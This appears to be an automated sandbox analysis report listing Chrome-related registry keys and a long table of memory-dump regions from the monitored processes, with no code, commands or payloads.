HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
nmmhkkegccagdldgiimedpiccmgmieda
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
pkedcjkdefgpdelpbcmbmeomcjbeemfm
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
nmmhkkegccagdldgiimedpiccmgmieda
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
nmmhkkegccagdldgiimedpiccmgmieda
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\BLBeacon
|
state
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\ThirdParty
|
StatusCodes
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\ThirdParty
|
StatusCodes
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\BLBeacon
|
state
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
software_reporter.reporting
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
module_blacklist_cache_md5_digest
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
media.storage_id_salt
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
google.services.last_account_id
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
google.services.account_id
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
software_reporter.prompt_seed
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
settings_reset_prompt.last_triggered_for_homepage
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
default_search_provider_data.template_url_data
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
safebrowsing.incidents_sent
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
pinned_tabs
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
search_provider_overrides
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
settings_reset_prompt.last_triggered_for_default_search
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
prefs.preference_reset_time
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
google.services.last_username
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
session.startup_urls
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
session.restore_on_startup
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
software_reporter.prompt_version
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
settings_reset_prompt.last_triggered_for_startup_urls
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
settings_reset_prompt.prompt_wave
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
homepage
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
homepage_is_newtabpage
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
browser.show_home_button
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\StabilityMetrics
|
user_experience_metrics.stability.exited_cleanly
|
||
|
HKEY_CURRENT_USER\Software\Google\Update\ClientState\{8A69D345-D564-463c-AFF1-A69D9E530F96}
|
lastrun
|
There are 36 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
2E956284000
|
heap
|
page read and write
|
|
|
|
2E956090000
|
heap
|
page read and write
|
|
|
|
A2EC0FE000
|
stack
|
page read and write
|
||
|
17D28402000
|
heap
|
page read and write
|
||
|
253944B0000
|
heap
|
page read and write
|
||
|
1E317308000
|
trusted library allocation
|
page read and write
|
||
|
44B1E79000
|
stack
|
page read and write
|
||
|
17D27F9B000
|
heap
|
page read and write
|
||
|
1E31701F000
|
heap
|
page read and write
|
||
|
17D27629000
|
heap
|
page read and write
|
||
|
2474D713000
|
heap
|
page read and write
|
||
|
2E9560E3000
|
heap
|
page read and write
|
||
|
1E312308000
|
heap
|
page read and write
|
||
|
253945E8000
|
heap
|
page read and write
|
||
|
91459FC000
|
stack
|
page read and write
|
||
|
2E956146000
|
heap
|
page read and write
|
||
|
17D27FAD000
|
heap
|
page read and write
|
||
|
1E317179000
|
heap
|
page read and write
|
||
|
1E316F40000
|
trusted library allocation
|
page read and write
|
||
|
17D27F88000
|
heap
|
page read and write
|
||
|
1E316F74000
|
trusted library allocation
|
page read and write
|
||
|
253945EE000
|
heap
|
page read and write
|
||
|
2E9560D3000
|
heap
|
page read and write
|
||
|
914557E000
|
stack
|
page read and write
|
||
|
268E383C000
|
heap
|
page read and write
|
||
|
1E317108000
|
heap
|
page read and write
|
||
|
234E7340000
|
trusted library allocation
|
page read and write
|
||
|
1E316F7C000
|
trusted library allocation
|
page read and write
|
||
|
17D27670000
|
heap
|
page read and write
|
||
|
F0F119E000
|
stack
|
page read and write
|
||
|
1E312F00000
|
trusted library allocation
|
page read and write
|
||
|
17D27F97000
|
heap
|
page read and write
|
||
|
2E956030000
|
heap
|
page read and write
|
||
|
1E311AFE000
|
heap
|
page read and write
|
||
|
17D27F86000
|
heap
|
page read and write
|
||
|
2264EBA0000
|
heap
|
page read and write
|
||
|
17D27F9B000
|
heap
|
page read and write
|
||
|
189A0802000
|
heap
|
page read and write
|
||
|
BE317F000
|
stack
|
page read and write
|
||
|
17D28402000
|
heap
|
page read and write
|
||
|
A2EBFFF000
|
stack
|
page read and write
|
||
|
189A0871000
|
heap
|
page read and write
|
||
|
17D27F73000
|
heap
|
page read and write
|
||
|
2E959690000
|
heap
|
page read and write
|
||
|
17D27F86000
|
heap
|
page read and write
|
||
|
2264EF02000
|
heap
|
page read and write
|
||
|
2264EE29000
|
heap
|
page read and write
|
||
|
1E316F90000
|
trusted library allocation
|
page read and write
|
||
|
17D27702000
|
heap
|
page read and write
|
||
|
1E311A57000
|
heap
|
page read and write
|
||
|
17D27F00000
|
heap
|
page read and write
|
||
|
25394875000
|
heap
|
page read and write
|
||
|
268E384B000
|
heap
|
page read and write
|
||
|
1E316FA4000
|
trusted library allocation
|
page read and write
|
||
|
17D27FAA000
|
heap
|
page read and write
|
||
|
25394603000
|
heap
|
page read and write
|
||
|
17D27613000
|
heap
|
page read and write
|
||
|
1F392652000
|
heap
|
page read and write
|
||
|
D53857E000
|
stack
|
page read and write
|
||
|
268E3813000
|
heap
|
page read and write
|
||
|
17D27F86000
|
heap
|
page read and write
|
||
|
44B1EFE000
|
stack
|
page read and write
|
||
|
234E6689000
|
heap
|
page read and write
|
||
|
1E312313000
|
heap
|
page read and write
|
||
|
189A0902000
|
heap
|
page read and write
|
||
|
1E311A13000
|
heap
|
page read and write
|
||
|
189A0700000
|
heap
|
page read and write
|
||
|
17D27FA8000
|
heap
|
page read and write
|
||
|
17D27FD8000
|
heap
|
page read and write
|
||
|
1E312BA0000
|
trusted library section
|
page readonly
|
||
|
1E312308000
|
heap
|
page read and write
|
||
|
1E3173C0000
|
remote allocation
|
page read and write
|
||
|
1E3174B0000
|
trusted library allocation
|
page read and write
|
||
|
D5384FB000
|
stack
|
page read and write
|
||
|
2474D64F000
|
heap
|
page read and write
|
||
|
17D27F97000
|
heap
|
page read and write
|
||
|
253945C0000
|
heap
|
page read and write
|
||
|
17D2764E000
|
heap
|
page read and write
|
||
|
1E317102000
|
heap
|
page read and write
|
||
|
189A0913000
|
heap
|
page read and write
|
||
|
268E3856000
|
heap
|
page read and write
|
||
|
1E3121F3000
|
trusted library allocation
|
page read and write
|
||
|
253945EE000
|
heap
|
page read and write
|
||
|
1F392530000
|
heap
|
page read and write
|
||
|
17D27F91000
|
heap
|
page read and write
|
||
|
1E316FA0000
|
trusted library allocation
|
page read and write
|
||
|
17D27F95000
|
heap
|
page read and write
|
||
|
1E317300000
|
trusted library allocation
|
page read and write
|
||
|
17D27F89000
|
heap
|
page read and write
|
||
|
2474D702000
|
heap
|
page read and write
|
||
|
1F392702000
|
heap
|
page read and write
|
||
|
17D273C0000
|
heap
|
page read and write
|
||
|
17D27F84000
|
heap
|
page read and write
|
||
|
1E317106000
|
heap
|
page read and write
|
||
|
2474D540000
|
heap
|
page read and write
|
||
|
234E67C0000
|
trusted library allocation
|
page read and write
|
||
|
F0F17FE000
|
stack
|
page read and write
|
||
|
1E316F7B000
|
trusted library allocation
|
page read and write
|
||
|
1E3173D0000
|
trusted library allocation
|
page read and write
|
||
|
268E3640000
|
heap
|
page read and write
|
||
|
73501FE000
|
stack
|
page read and write
|
||
|
17D27716000
|
heap
|
page read and write
|
||
|
253945C7000
|
heap
|
page read and write
|
||
|
17D27F96000
|
heap
|
page read and write
|
||
|
1E317390000
|
trusted library allocation
|
page read and write
|
||
|
1F39268C000
|
heap
|
page read and write
|
||
|
1E31239B000
|
heap
|
page read and write
|
||
|
1E317113000
|
heap
|
page read and write
|
||
|
F25CFFE000
|
stack
|
page read and write
|
||
|
189A0FA0000
|
trusted library allocation
|
page read and write
|
||
|
189A0866000
|
heap
|
page read and write
|
||
|
2E9560DF000
|
heap
|
page read and write
|
||
|
528377C000
|
stack
|
page read and write
|
||
|
17D28400000
|
heap
|
page read and write
|
||
|
2E956137000
|
heap
|
page read and write
|
||
|
17D2763C000
|
heap
|
page read and write
|
||
|
1E317370000
|
trusted library allocation
|
page read and write
|
||
|
17D27FA8000
|
heap
|
page read and write
|
||
|
268E384E000
|
heap
|
page read and write
|
||
|
734FEFB000
|
stack
|
page read and write
|
||
|
F0F109B000
|
stack
|
page read and write
|
||
|
17D27708000
|
heap
|
page read and write
|
||
|
A2EBBFB000
|
stack
|
page read and write
|
||
|
1E31239B000
|
heap
|
page read and write
|
||
|
17D27713000
|
heap
|
page read and write
|
||
|
1E3170AA000
|
heap
|
page read and write
|
||
|
2264EC10000
|
heap
|
page read and write
|
||
|
1E311B13000
|
heap
|
page read and write
|
||
|
1F392708000
|
heap
|
page read and write
|
||
|
189A0866000
|
heap
|
page read and write
|
||
|
2E957BF4000
|
heap
|
page read and write
|
||
|
268E3800000
|
heap
|
page read and write
|
||
|
A2EBAFE000
|
stack
|
page read and write
|
||
|
A2EB7EB000
|
stack
|
page read and write
|
||
|
17D276F7000
|
heap
|
page read and write
|
||
|
234E6480000
|
heap
|
page read and write
|
||
|
1E317106000
|
heap
|
page read and write
|
||
|
25394380000
|
heap
|
page read and write
|
||
|
1E316FD0000
|
trusted library allocation
|
page read and write
|
||
|
1E311A71000
|
heap
|
page read and write
|
||
|
234E7550000
|
trusted library allocation
|
page read and write
|
||
|
2E957BF0000
|
heap
|
page read and write
|
||
|
1E317108000
|
heap
|
page read and write
|
||
|
2474D5B0000
|
heap
|
page read and write
|
||
|
BE2AFF000
|
stack
|
page read and write
|
||
|
F0F14FB000
|
stack
|
page read and write
|
||
|
1E317106000
|
heap
|
page read and write
|
||
|
17D27F86000
|
heap
|
page read and write
|
||
|
17D27F9B000
|
heap
|
page read and write
|
||
|
268E35E0000
|
heap
|
page read and write
|
||
|
1E31710F000
|
heap
|
page read and write
|
||
|
2E959691000
|
heap
|
page read and write
|
||
|
17D27F95000
|
heap
|
page read and write
|
||
|
1E31239B000
|
heap
|
page read and write
|
||
|
1E3119C0000
|
trusted library allocation
|
page read and write
|
||
|
A2EBEF7000
|
stack
|
page read and write
|
||
|
1F392602000
|
heap
|
page read and write
|
||
|
1E312300000
|
heap
|
page read and write
|
||
|
17D27FAD000
|
heap
|
page read and write
|
||
|
1E312318000
|
heap
|
page read and write
|
||
|
A2EBDFD000
|
stack
|
page read and write
|
||
|
1E3170A8000
|
heap
|
page read and write
|
||
|
5283AFF000
|
stack
|
page read and write
|
||
|
17D27F85000
|
heap
|
page read and write
|
||
|
253945D7000
|
heap
|
page read and write
|
||
|
1E31703F000
|
heap
|
page read and write
|
||
|
2264EE50000
|
heap
|
page read and write
|
||
|
17D27FA9000
|
heap
|
page read and write
|
||
|
17D27F6F000
|
heap
|
page read and write
|
||
|
1F392713000
|
heap
|
page read and write
|
||
|
17D27F86000
|
heap
|
page read and write
|
||
|
F25CDFF000
|
stack
|
page read and write
|
||
|
2264EE02000
|
heap
|
page read and write
|
||
|
1E317106000
|
heap
|
page read and write
|
||
|
D53827D000
|
stack
|
page read and write
|
||
|
1E31711D000
|
heap
|
page read and write
|
||
|
BE21EF000
|
stack
|
page read and write
|
||
|
234E667E000
|
heap
|
page read and write
|
||
|
A2EBCFB000
|
stack
|
page read and write
|
||
|
1E316F76000
|
trusted library allocation
|
page read and write
|
||
|
1E3170E7000
|
heap
|
page read and write
|
||
|
17D27F84000
|
heap
|
page read and write
|
||
|
1E317011000
|
heap
|
page read and write
|
||
|
17D27F87000
|
heap
|
page read and write
|
||
|
2E956050000
|
heap
|
page read and write
|
||
|
17D273B0000
|
heap
|
page read and write
|
||
|
234E667D000
|
heap
|
page read and write
|
||
|
17D27F98000
|
heap
|
page read and write
|
||
|
44B1CF9000
|
stack
|
page read and write
|
||
|
734F9FC000
|
stack
|
page read and write
|
||
|
2474D700000
|
heap
|
page read and write
|
||
|
1E312580000
|
trusted library allocation
|
page read and write
|
||
|
17D2764B000
|
heap
|
page read and write
|
||
|
2474D671000
|
heap
|
page read and write
|
||
|
BE2A7B000
|
stack
|
page read and write
|
||
|
234E6630000
|
heap
|
page read and write
|
||
|
234E6810000
|
heap
|
page readonly
|
||
|
189A0900000
|
heap
|
page read and write
|
||
|
17D27F84000
|
heap
|
page read and write
|
||
|
44B1D79000
|
stack
|
page read and write
|
||
|
2E957BB0000
|
heap
|
page read and write
|
||
|
17D27F7F000
|
heap
|
page read and write
|
||
|
17D2764C000
|
heap
|
page read and write
|
||
|
17D28403000
|
heap
|
page read and write
|
||
|
F25C989000
|
stack
|
page read and write
|
||
|
17D28419000
|
heap
|
page read and write
|
||
|
AF42CFE000
|
stack
|
page read and write
|
||
|
1E3123DC000
|
heap
|
page read and write
|
||
|
268E3900000
|
heap
|
page read and write
|
||
|
1E316F00000
|
trusted library allocation
|
page read and write
|
||
|
1F392650000
|
heap
|
page read and write
|
||
|
2474D650000
|
heap
|
page read and write
|
||
|
17D28402000
|
heap
|
page read and write
|
||
|
189A083C000
|
heap
|
page read and write
|
||
|
25394870000
|
heap
|
page read and write
|
||
|
17D27F73000
|
heap
|
page read and write
|
||
|
17D27F84000
|
heap
|
page read and write
|
||
|
1E312215000
|
heap
|
page read and write
|
||
|
17D28402000
|
heap
|
page read and write
|
||
|
17D27F73000
|
heap
|
page read and write
|
||
|
1E3175D0000
|
trusted library allocation
|
page read and write
|
||
|
253945E4000
|
heap
|
page read and write
|
||
|
17D27F97000
|
heap
|
page read and write
|
||
|
17D27F18000
|
heap
|
page read and write
|
||
|
2264EF08000
|
heap
|
page read and write
|
||
|
528387B000
|
stack
|
page read and write
|
||
|
189A0800000
|
heap
|
page read and write
|
||
|
1E3119D0000
|
trusted library section
|
page read and write
|
||
|
1E317108000
|
heap
|
page read and write
|
||
|
1E317102000
|
heap
|
page read and write
|
||
|
F25CF7F000
|
stack
|
page read and write
|
||
|
BE287F000
|
stack
|
page read and write
|
||
|
1E3173A0000
|
trusted library allocation
|
page read and write
|
||
|
1E312B90000
|
trusted library section
|
page readonly
|
||
|
1F39264C000
|
heap
|
page read and write
|
||
|
D5382FE000
|
stack
|
page read and write
|
||
|
189A0813000
|
heap
|
page read and write
|
||
|
17D27FC0000
|
heap
|
page read and write
|
||
|
1E317106000
|
heap
|
page read and write
|
||
|
2264EE5F000
|
heap
|
page read and write
|
||
|
1E316F60000
|
trusted library allocation
|
page read and write
|
||
|
268E3913000
|
heap
|
page read and write
|
||
|
1E31711C000
|
heap
|
page read and write
|
||
|
BE2CFF000
|
stack
|
page read and write
|
||
|
734FFFE000
|
stack
|
page read and write
|
||
|
189A1002000
|
trusted library allocation
|
page read and write
|
||
|
17D27FD8000
|
heap
|
page read and write
|
||
|
253945F0000
|
heap
|
page read and write
|
||
|
1E3121D1000
|
trusted library allocation
|
page read and write
|
||
|
268E3853000
|
heap
|
page read and write
|
||
|
1E311850000
|
heap
|
page read and write
|
||
|
17D27F7D000
|
heap
|
page read and write
|
||
|
17D27F61000
|
heap
|
page read and write
|
||
|
AF429EB000
|
stack
|
page read and write
|
||
|
268E3829000
|
heap
|
page read and write
|
||
|
2474D5E0000
|
trusted library allocation
|
page read and write
|
||
|
1E312B70000
|
trusted library section
|
page readonly
|
||
|
1E31239C000
|
heap
|
page read and write
|
||
|
17D27F86000
|
heap
|
page read and write
|
||
|
17D27F89000
|
heap
|
page read and write
|
||
|
17D27FC0000
|
heap
|
page read and write
|
||
|
189A06A0000
|
heap
|
page read and write
|
||
|
253945E3000
|
heap
|
page read and write
|
||
|
2E956280000
|
heap
|
page read and write
|
||
|
2E956166000
|
heap
|
page read and write
|
||
|
17D27F8B000
|
heap
|
page read and write
|
||
|
1E31715E000
|
heap
|
page read and write
|
||
|
1E3118C0000
|
heap
|
page read and write
|
||
|
1E317108000
|
heap
|
page read and write
|
||
|
D538677000
|
stack
|
page read and write
|
||
|
234E6750000
|
trusted library allocation
|
page read and write
|
||
|
17D27F79000
|
heap
|
page read and write
|
||
|
D5383FC000
|
stack
|
page read and write
|
||
|
17D27F86000
|
heap
|
page read and write
|
||
|
52838FE000
|
stack
|
page read and write
|
||
|
1E317102000
|
heap
|
page read and write
|
||
|
5283C7E000
|
unkown
|
page read and write
|
||
|
1E312359000
|
heap
|
page read and write
|
||
|
17D275E0000
|
remote allocation
|
page read and write
|
||
|
17D27F9C000
|
heap
|
page read and write
|
||
|
17D276C5000
|
heap
|
page read and write
|
||
|
234E6800000
|
trusted library allocation
|
page read and write
|
||
|
44B18DC000
|
stack
|
page read and write
|
||
|
2E956153000
|
heap
|
page read and write
|
||
|
2474D62A000
|
heap
|
page read and write
|
||
|
1E316F60000
|
trusted library allocation
|
page read and write
|
||
|
1E312202000
|
heap
|
page read and write
|
||
|
1F392590000
|
heap
|
page read and write
|
||
|
2264EE3C000
|
heap
|
page read and write
|
||
|
1E312960000
|
trusted library allocation
|
page read and write
|
||
|
268E3851000
|
heap
|
page read and write
|
||
|
A2EBA7E000
|
stack
|
page read and write
|
||
|
1E31710C000
|
heap
|
page read and write
|
||
|
17D27600000
|
heap
|
page read and write
|
||
|
17D28420000
|
heap
|
page read and write
|
||
|
1E312318000
|
heap
|
page read and write
|
||
|
17D27F8A000
|
heap
|
page read and write
|
||
|
17D27F7D000
|
heap
|
page read and write
|
||
|
1E317510000
|
trusted library allocation
|
page read and write
|
||
|
1E317570000
|
trusted library allocation
|
page read and write
|
||
|
BE2B7F000
|
stack
|
page read and write
|
||
|
1E31730E000
|
trusted library allocation
|
page read and write
|
||
|
17D27F63000
|
heap
|
page read and write
|
||
|
1E317324000
|
trusted library allocation
|
page read and write
|
||
|
2E956137000
|
heap
|
page read and write
|
||
|
AF42C7E000
|
stack
|
page read and write
|
||
|
1E317114000
|
heap
|
page read and write
|
||
|
17D276BF000
|
heap
|
page read and write
|
||
|
268E3902000
|
heap
|
page read and write
|
||
|
268E384D000
|
heap
|
page read and write
|
||
|
1F392649000
|
heap
|
page read and write
|
||
|
253945E6000
|
heap
|
page read and write
|
||
|
1E312200000
|
heap
|
page read and write
|
||
|
268E3883000
|
heap
|
page read and write
|
||
|
234E6820000
|
trusted library allocation
|
page read and write
|
||
|
17D27F86000
|
heap
|
page read and write
|
||
|
17D27FAD000
|
heap
|
page read and write
|
||
|
2E95612B000
|
heap
|
page read and write
|
||
|
1E312B80000
|
trusted library section
|
page readonly
|
||
|
1E311A3E000
|
heap
|
page read and write
|
||
|
2E956099000
|
heap
|
page read and write
|
||
|
2264EE13000
|
heap
|
page read and write
|
||
|
2E95612F000
|
heap
|
page read and write
|
||
|
2E956138000
|
heap
|
page read and write
|
||
|
234E7590000
|
trusted library allocation
|
page read and write
|
||
|
2264EE65000
|
heap
|
page read and write
|
||
|
17D27F77000
|
heap
|
page read and write
|
||
|
1E316F90000
|
trusted library allocation
|
page read and write
|
||
|
1E312501000
|
trusted library allocation
|
page read and write
|
||
|
253945F0000
|
heap
|
page read and write
|
||
|
234E65C0000
|
heap
|
page read and write
|
||
|
1F39267C000
|
heap
|
page read and write
|
||
|
2264EE83000
|
heap
|
page read and write
|
||
|
1E3173C0000
|
remote allocation
|
page read and write
|
||
|
2474D550000
|
heap
|
page read and write
|
||
|
1E312800000
|
trusted library allocation
|
page read and write
|
||
|
1E312359000
|
heap
|
page read and write
|
||
|
1E317570000
|
trusted library allocation
|
page read and write
|
||
|
17D2762D000
|
heap
|
page read and write
|
||
|
2474D64B000
|
heap
|
page read and write
|
||
|
17D27FAC000
|
heap
|
page read and write
|
||
|
2474D613000
|
heap
|
page read and write
|
||
|
1E317500000
|
trusted library allocation
|
page read and write
|
||
|
268E35D0000
|
heap
|
page read and write
|
||
|
1E312318000
|
heap
|
page read and write
|
||
|
1F392627000
|
heap
|
page read and write
|
||
|
189A0690000
|
heap
|
page read and write
|
||
|
17D27F86000
|
heap
|
page read and write
|
||
|
52833EE000
|
stack
|
page read and write
|
||
|
1E3121F0000
|
trusted library allocation
|
page read and write
|
||
|
234E65E0000
|
heap
|
page read and write
|
||
|
17D27F8A000
|
heap
|
page read and write
|
||
|
1E311A8C000
|
heap
|
page read and write
|
||
|
17D27FAD000
|
heap
|
page read and write
|
||
|
1E312BB0000
|
trusted library section
|
page readonly
|
||
|
1E312A80000
|
trusted library allocation
|
page read and write
|
||
|
1E31239A000
|
heap
|
page read and write
|
||
|
F0F18FF000
|
stack
|
page read and write
|
||
|
17D27F73000
|
heap
|
page read and write
|
||
|
BE216C000
|
stack
|
page read and write
|
||
|
D53877F000
|
stack
|
page read and write
|
||
|
17D27F79000
|
heap
|
page read and write
|
||
|
17D27F84000
|
heap
|
page read and write
|
||
|
17D27F97000
|
heap
|
page read and write
|
||
|
1E3175C0000
|
trusted library allocation
|
page read and write
|
||
|
9145879000
|
stack
|
page read and write
|
||
|
1E317380000
|
trusted library allocation
|
page read and write
|
||
|
1E31710D000
|
heap
|
page read and write
|
||
|
17D27F73000
|
heap
|
page read and write
|
||
|
BE2F7D000
|
stack
|
page read and write
|
||
|
268E382D000
|
heap
|
page read and write
|
||
|
17D27F9A000
|
heap
|
page read and write
|
||
|
234E6840000
|
heap
|
page read and write
|
||
|
2E956165000
|
heap
|
page read and write
|
||
|
17D27E02000
|
heap
|
page read and write
|
||
|
234E6639000
|
heap
|
page read and write
|
||
|
1E312970000
|
trusted library allocation
|
page read and write
|
||
|
234E667E000
|
heap
|
page read and write
|
||
|
F25CE7E000
|
stack
|
page read and write
|
||
|
17D276E1000
|
heap
|
page read and write
|
||
|
1F3925C0000
|
trusted library allocation
|
page read and write
|
||
|
AF42FF7000
|
stack
|
page read and write
|
||
|
AF42DFC000
|
stack
|
page read and write
|
||
|
1E316F50000
|
trusted library allocation
|
page read and write
|
||
|
2474D63C000
|
heap
|
page read and write
|
||
|
91455FF000
|
stack
|
page read and write
|
||
|
2264EF13000
|
heap
|
page read and write
|
||
|
D53887E000
|
stack
|
page read and write
|
||
|
17D27F9C000
|
heap
|
page read and write
|
||
|
253945D2000
|
heap
|
page read and write
|
||
|
1E31230E000
|
heap
|
page read and write
|
||
|
17D27F1F000
|
heap
|
page read and write
|
||
|
1E31710A000
|
heap
|
page read and write
|
||
|
2474D600000
|
heap
|
page read and write
|
||
|
1F39268A000
|
heap
|
page read and write
|
||
|
17D27647000
|
heap
|
page read and write
|
||
|
1E312980000
|
trusted library allocation
|
page read and write
|
||
|
1E316F70000
|
trusted library allocation
|
page read and write
|
||
|
1F393002000
|
trusted library allocation
|
page read and write
|
||
|
2E959190000
|
heap
|
page read and write
|
||
|
17D27F71000
|
heap
|
page read and write
|
||
|
17D27F71000
|
heap
|
page read and write
|
||
|
D537FEB000
|
stack
|
page read and write
|
||
|
2E956179000
|
heap
|
page read and write
|
||
|
17D27F97000
|
heap
|
page read and write
|
||
|
17D27420000
|
heap
|
page read and write
|
||
|
17D28402000
|
heap
|
page read and write
|
||
|
17D275E0000
|
remote allocation
|
page read and write
|
||
|
91454FA000
|
stack
|
page read and write
|
||
|
1E317089000
|
heap
|
page read and write
|
||
|
17D27FD6000
|
heap
|
page read and write
|
||
|
17D27F88000
|
heap
|
page read and write
|
||
|
1E31239B000
|
heap
|
page read and write
|
||
|
17D27F97000
|
heap
|
page read and write
|
||
|
BE2E7A000
|
stack
|
page read and write
|
||
|
268E3740000
|
trusted library allocation
|
page read and write
|
||
|
17D27649000
|
heap
|
page read and write
|
||
|
1F392700000
|
heap
|
page read and write
|
||
|
1E311A00000
|
heap
|
page read and write
|
||
|
17D276B3000
|
heap
|
page read and write
|
||
|
AF42EFB000
|
stack
|
page read and write
|
||
|
17D27650000
|
heap
|
page read and write
|
||
|
F0F19FF000
|
stack
|
page read and write
|
||
|
2474D688000
|
heap
|
page read and write
|
||
|
189A0828000
|
heap
|
page read and write
|
||
|
234E6490000
|
trusted library allocation
|
page read and write
|
||
|
5283D79000
|
stack
|
page read and write
|
||
|
1E3170E0000
|
heap
|
page read and write
|
||
|
1E3170E4000
|
heap
|
page read and write
|
||
|
17D28403000
|
heap
|
page read and write
|
||
|
17D27F84000
|
heap
|
page read and write
|
||
|
17D27F80000
|
heap
|
page read and write
|
||
|
17D27F9C000
|
heap
|
page read and write
|
||
|
1F39263C000
|
heap
|
page read and write
|
||
|
1F392520000
|
heap
|
page read and write
|
||
|
1E312318000
|
heap
|
page read and write
|
||
|
2474D708000
|
heap
|
page read and write
|
||
|
528336B000
|
stack
|
page read and write
|
||
|
F0F16F7000
|
stack
|
page read and write
|
||
|
2264EE80000
|
heap
|
page read and write
|
||
|
1E317540000
|
trusted library allocation
|
page read and write
|
||
|
17D27F85000
|
heap
|
page read and write
|
||
|
1E316F70000
|
trusted library allocation
|
page read and write
|
||
|
1E312318000
|
heap
|
page read and write
|
||
|
268E4002000
|
trusted library allocation
|
page read and write
|
||
|
F0F15FB000
|
stack
|
page read and write
|
||
|
2264ED10000
|
trusted library allocation
|
page read and write
|
||
|
F0F111F000
|
stack
|
page read and write
|
||
|
253945F0000
|
heap
|
page read and write
|
||
|
BE2BFF000
|
stack
|
page read and write
|
||
|
2474E002000
|
trusted library allocation
|
page read and write
|
||
|
2264EF00000
|
heap
|
page read and write
|
||
|
AF430FF000
|
stack
|
page read and write
|
||
|
1E31702C000
|
heap
|
page read and write
|
||
|
1E31710C000
|
heap
|
page read and write
|
||
|
234E6641000
|
heap
|
page read and write
|
||
|
268E3908000
|
heap
|
page read and write
|
||
|
1E316F70000
|
trusted library allocation
|
page read and write
|
||
|
1E311AA0000
|
heap
|
page read and write
|
||
|
17D27520000
|
trusted library allocation
|
page read and write
|
||
|
5283BF8000
|
stack
|
page read and write
|
||
|
528367D000
|
stack
|
page read and write
|
||
|
1E311A8E000
|
heap
|
page read and write
|
||
|
1E31710D000
|
heap
|
page read and write
|
||
|
1E317000000
|
heap
|
page read and write
|
||
|
1E317108000
|
heap
|
page read and write
|
||
|
1F392600000
|
heap
|
page read and write
|
||
|
2264EE00000
|
heap
|
page read and write
|
||
|
BE2D7E000
|
stack
|
page read and write
|
||
|
1E312318000
|
heap
|
page read and write
|
||
|
234E6845000
|
heap
|
page read and write
|
||
|
17D27681000
|
heap
|
page read and write
|
||
|
1E317321000
|
trusted library allocation
|
page read and write
|
||
|
2474D67B000
|
heap
|
page read and write
|
||
|
1E3173C0000
|
remote allocation
|
page read and write
|
||
|
189A0856000
|
heap
|
page read and write
|
||
|
1E31239B000
|
heap
|
page read and write
|
||
|
17D27F16000
|
heap
|
page read and write
|
||
|
1E31239B000
|
heap
|
page read and write
|
||
|
17D27F79000
|
heap
|
page read and write
|
||
|
17D27F7D000
|
heap
|
page read and write
|
||
|
1E312359000
|
heap
|
page read and write
|
||
|
1E317062000
|
heap
|
page read and write
|
||
|
1E316F79000
|
trusted library allocation
|
page read and write
|
||
|
91458F8000
|
stack
|
page read and write
|
||
|
1E312318000
|
heap
|
page read and write
|
||
|
1F392613000
|
heap
|
page read and write
|
||
|
17D28402000
|
heap
|
page read and write
|
||
|
2E955EF0000
|
heap
|
page read and write
|
||
|
1F392629000
|
heap
|
page read and write
|
||
|
17D27F79000
|
heap
|
page read and write
|
||
|
268E3849000
|
heap
|
page read and write
|
||
|
BE2979000
|
stack
|
page read and write
|
||
|
234E6760000
|
trusted library allocation
|
page read and write
|
||
|
1E316FA0000
|
trusted library allocation
|
page read and write
|
||
|
BE2C7F000
|
stack
|
page read and write
|
||
|
25394602000
|
heap
|
page read and write
|
||
|
44B1DFE000
|
stack
|
page read and write
|
||
|
F25CD7F000
|
stack
|
page read and write
|
||
|
2264F602000
|
trusted library allocation
|
page read and write
|
||
|
1E311A76000
|
heap
|
page read and write
|
||
|
234E6676000
|
heap
|
page read and write
|
||
|
17D27F9D000
|
heap
|
page read and write
|
||
|
2E956134000
|
heap
|
page read and write
|
||
|
1E31710C000
|
heap
|
page read and write
|
||
|
1E31711B000
|
heap
|
page read and write
|
||
|
BE267A000
|
stack
|
page read and write
|
||
|
73500FB000
|
stack
|
page read and write
|
||
|
17D27FBE000
|
heap
|
page read and write
|
||
|
17D27F52000
|
heap
|
page read and write
|
||
|
253945EE000
|
heap
|
page read and write
|
||
|
17D276A9000
|
heap
